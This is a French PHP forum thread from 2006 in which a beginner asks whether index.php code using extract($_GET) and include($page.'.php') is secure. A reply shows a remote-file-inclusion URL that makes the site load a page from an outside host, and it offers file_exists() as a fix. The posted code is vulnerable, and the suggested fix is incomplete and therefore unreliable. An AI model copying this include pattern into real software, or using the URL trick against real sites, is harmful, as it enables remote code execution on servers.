Accueil > Forum > > > > include et securité
include et securité
dimanche 25 juin 2006 à 13:06:06 |
include et securité

craso
|
bonjour, je veux savoir si ma facon d'incluredes fichiers est sans faille, vu que je débute, je ne peux pas le dire. Tous les liens sont du type "index.php?page=ma_page". J'extrait $_GET['page'], et j'inclus la page "$_GET['page'].php". C'est simple mais je ne sais pas s'il y a une faille ou pas. Voici le code: <?php $ext = '.php'; extract($_GET); if (isset($page) ) { include($page.$ext); //ns appelons le contenu de la page centrale } else { include('accueil.php'); //page par defaut qunad elle n'existe pas ds le tablo } ?> Merci d'avance pour vos réponses.
|
|
dimanche 25 juin 2006 à 13:14:42 |
Re : include et securité

craso
|
a l'origine le code etait comme ca (je sais pas pourquoi je l'ai changé): <?php $ext = '.php'; $dossier = 'includes/'; extract($_GET);
if (isset($page) ) { include($dossier.$page.$ext); //ns appelons le contenu de la page centrale } else { include('accueil.php'); //page par defaut qunad elle n'existe pas ds le tablo } ?>
|
|
dimanche 25 juin 2006 à 15:22:13 |

xactise
|
oui elle peut être dangeureuse ta façon d'inclure ta page
je t'explique
tu verifie si uen page a été passer en parametre sa c'est d'accord
et ensuite tu l'inclu directement
c'est sa qui est pas bon
en effet si je fait :
http://www.ton-site.com/index.php?page=http://www.mon-site.com/ma_page_dangeusereuse
ton site va inclure mon fichier dangeureux provenant de mon site
rajoute la condition
if(file_exists($page))
sa verifie si la page envoyer en parametre existe sur le serveur
|
|
dimanche 25 juin 2006 à 16:04:42 |

craso
|
même s'il s'agit d'une page dans un dossier ? Avec ton exemple, mon index va vouloir afficher "mon_dossier_include/http://www.mon-site.com/ma_page_dangeusereuse", non?
|
|
mardi 27 juin 2006 à 12:03:48 |

coucou747
|